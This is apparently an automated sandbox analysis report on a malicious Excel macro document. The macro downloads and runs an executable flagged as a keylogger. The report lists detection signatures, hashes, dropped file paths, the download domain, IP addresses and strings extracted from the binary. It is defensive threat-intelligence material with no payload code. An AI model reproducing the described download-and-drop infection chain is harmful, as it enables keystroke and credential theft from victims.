Play interactive tour

Edit tour

Analysis Report request_form_1611565093.xlsm

Overview

General Information

Sample Name:	request_form_1611565093.xlsm
Analysis ID:	343657
MD5:	9c47eef4c66e4587ecddb55cfc3ef1e6
SHA1:	da444ad39f513282d1918beceadc0ceb6edc0d3d
SHA256:	042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Checks for available system drives (often done to infect USB drives)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 4640 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

fdcbn.exe (PID: 4872 cmdline: 'C:\otrgh\sdgvjk\fdcbn.exe' MD5: DC74FAE0ADA0A2426E77588E3797E040)

fdcbn.exe (PID: 5384 cmdline: 'C:\otrgh\sdgvjk\fdcbn.exe' MD5: DC74FAE0ADA0A2426E77588E3797E040)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: fdcbn.exe PID: 4872	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: fdcbn.exe PID: 5384	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 50.87.232.245:443 -> 192.168.2.3:49722 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: kernel32.pdbUGP source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdbUGP source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdb source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7`d source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp, 9ght3erd[1].exe.0.dr
Source:	Binary string: Dw=helpvolumelabelmasteredudfUDFJOLIETItemPosItemOrder%s (%d).%sData\Program Files\Data\Windows\Program Files\Data\Program Files (x86)\Data\ProgramData\.cdxml.cer.automaticdestinations-ms.cat.dmp.cookie.customdestinations-msWindows\$Windows.~BT\Program Files (x86)\ProgramData\.appxbundle.appxpackageWindows.old\.appx.msip.msm.ocx.olb.mui.nst.etl.fon.dsft.efi.mpb.mp.partial.pdb.p7s.p7x.pfx.pem.pfm.p10.p12.ost.otf.p7m.p7r.p7b.p7c.sys.ttc.spkg.sst.vmrs.vsi.vmcx.psd1.psf.sft.spc.rll.wim.winmd.vsix.wfsWININET.xap\shellL source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: ole32.pdbUGP source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7 source: 9ght3erd[1].exe.0.dr
Source:	Binary string: ole32.pdb source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdb source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdb source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: user32.pdb source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdbUGP source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdb source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: kernel32.pdb source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: user32.pdbUGP source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdbUGP source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdbUGP source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdbUGP source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdb source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp

Spreading:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: z:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: x:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: v:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: t:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: r:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: p:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: n:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: l:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: j:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: h:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: f:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: b:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: y:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: w:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: u:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: s:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: q:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: o:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: m:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: k:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: i:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: g:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: e:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: c:
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: a:

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\otrgh\sdgvjk\fdcbn.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe	Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: 9ght3erd[1].exe.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\otrgh\sdgvjk\fdcbn.exe

Source: global traffic

DNS query: name: japort.com

Source: global traffic

TCP traffic: 192.168.2.3:49722 -> 50.87.232.245:443

Source: global traffic

TCP traffic: 192.168.2.3:49722 -> 50.87.232.245:443

Networking:

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198

Source: unknown

DNS traffic detected: queries for: japort.com

Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	String found in binary or memory: http://.css
Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	String found in binary or memory: http://.jpg
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrlSoftware
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
